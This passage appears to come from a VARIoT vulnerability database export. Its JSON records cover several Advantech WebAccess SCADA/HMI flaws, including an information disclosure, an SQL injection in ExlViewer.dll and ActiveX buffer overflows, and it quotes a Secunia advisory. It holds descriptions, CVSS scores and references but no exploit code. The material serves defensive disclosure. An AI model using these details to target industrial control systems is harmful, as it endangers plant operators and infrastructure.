"db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0236", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2012-0236", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1977818e-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-53517", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0236", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-0236", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-412", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-53517", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53517" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "CNNVD", "id": "CNNVD-201202-412" }, { "db": "NVD", "id": "CVE-2012-0236" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess 7.0 and earlier allows remote attackers to obtain sensitive information via a direct request to a URL. NOTE: the vendor reportedly \"does not consider it to be a security risk.\". Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess submits a specially crafted URL that does not authenticate users with access to restricted information. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. Vulnerabilities exist in Advantech/BroadWin WebAccess 7.0 and earlier versions. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0236" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53517" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0236", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-412", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0665", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001554", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1977818E-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53517", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "VULHUB", "id": "VHN-53517" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-412" }, { "db": "NVD", "id": "CVE-2012-0236" } ] }, "id": "VAR-201202-0216", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "VULHUB", "id": "VHN-53517" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0665" } ] }, "last_update_date": "2024-11-23T21:46:31.842000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Information Disclosure Vulnerability (CNVD-2012-0665)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10231" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53517" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "NVD", "id": "CVE-2012-0236" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0236" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0236" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "VULHUB", "id": "VHN-53517" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-412" }, { "db": "NVD", "id": "CVE-2012-0236" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "VULHUB", "id": "VHN-53517" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-412" }, { "db": "NVD", "id": "CVE-2012-0236" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0665" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53517" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-412" }, { "date": "2012-02-21T13:31:57.033000", "db": "NVD", "id": "CVE-2012-0236" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2012-0665" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53517" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-412" }, { "date": "2024-11-21T01:34:38.277000", "db": "NVD", "id": "CVE-2012-0236" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-412" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Vulnerability in which important information is obtained", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001554" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-412" } ], "trust": 0.6 } }
var-201806-1812
Vulnerability from variot
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.The specific flaw exists within ExlViewer.dll. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to extract information from the underlying database. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.1, "vendor": "advantech", "version": "0" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-524" }, { "db": "CNVD", "id": "CNVD-2018-11441" }, { "db": "BID", "id": "100231" } ] }, "credits": { "_id": null, "data": "rgod", "sources": [ { "db": "ZDI", "id": "ZDI-17-524" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-524", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2018-11441", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-524", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2018-11441", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-524" }, { "db": "CNVD", "id": "CNVD-2018-11441" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.The specific flaw exists within ExlViewer.dll. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to extract information from the underlying database. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-524" }, { "db": "CNVD", "id": "CNVD-2018-11441" }, { "db": "BID", "id": "100231" }, { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1" } ], "trust": 1.62 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-524", "trust": 1.0 }, { "db": "BID", "id": "100231", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-11441", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4211", "trust": 0.7 }, { "db": "IVD", "id": "E2F35722-39AB-11E9-BBBB-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-524" }, { "db": "CNVD", "id": "CNVD-2018-11441" }, { "db": "BID", "id": "100231" } ] }, "id": "VAR-201806-1812", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11441" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11441" } ] }, "last_update_date": "2022-05-17T01:50:55.396000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2018-11441)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/131913" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-524" }, { "db": "CNVD", "id": "CNVD-2018-11441" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/100231" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-524/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-524" }, { "db": "CNVD", "id": "CNVD-2018-11441" }, { "db": "BID", "id": "100231" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-17-524", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-11441", "ident": null }, { "db": "BID", "id": "100231", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-06-13T00:00:00", "db": "IVD", "id": "e2f35722-39ab-11e9-bbbb-000c29342cb1", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-524", "ident": null }, { "date": "2018-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2018-11441", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "BID", "id": "100231", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-524", "ident": null }, { "date": "2018-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2018-11441", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "BID", "id": "100231", "ident": null } ] }, "threat_type": { "_id": null, "data": "network", "sources": [ { "db": "BID", "id": "100231" } ], "trust": 0.3 }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess ExlViewer getTemplateDetailByName template SQL Injection Information Disclosure Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-524" } ], "trust": 0.7 }, "type": { "_id": null, "data": "Input Validation Error", "sources": [ { "db": "BID", "id": "100231" } ], "trust": 0.3 } }
var-201610-0692
Vulnerability from variot
WebAccess HMI / SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems.
An ActiveX control in Advantech WebAccess 8.1 has a buffer overflow vulnerability. An attacker can use this vulnerability to build a malicious web page to lure users to access and execute arbitrary code in the context of the application
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201610-0692", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.1" } ], "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2016-10222", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "CNVD", "id": "CNVD-2016-10222", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WebAccess HMI / SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. \n\nAn ActiveX control in Advantech WebAccess 8.1 has a buffer overflow vulnerability. An attacker can use this vulnerability to build a malicious web page to lure users to access and execute arbitrary code in the context of 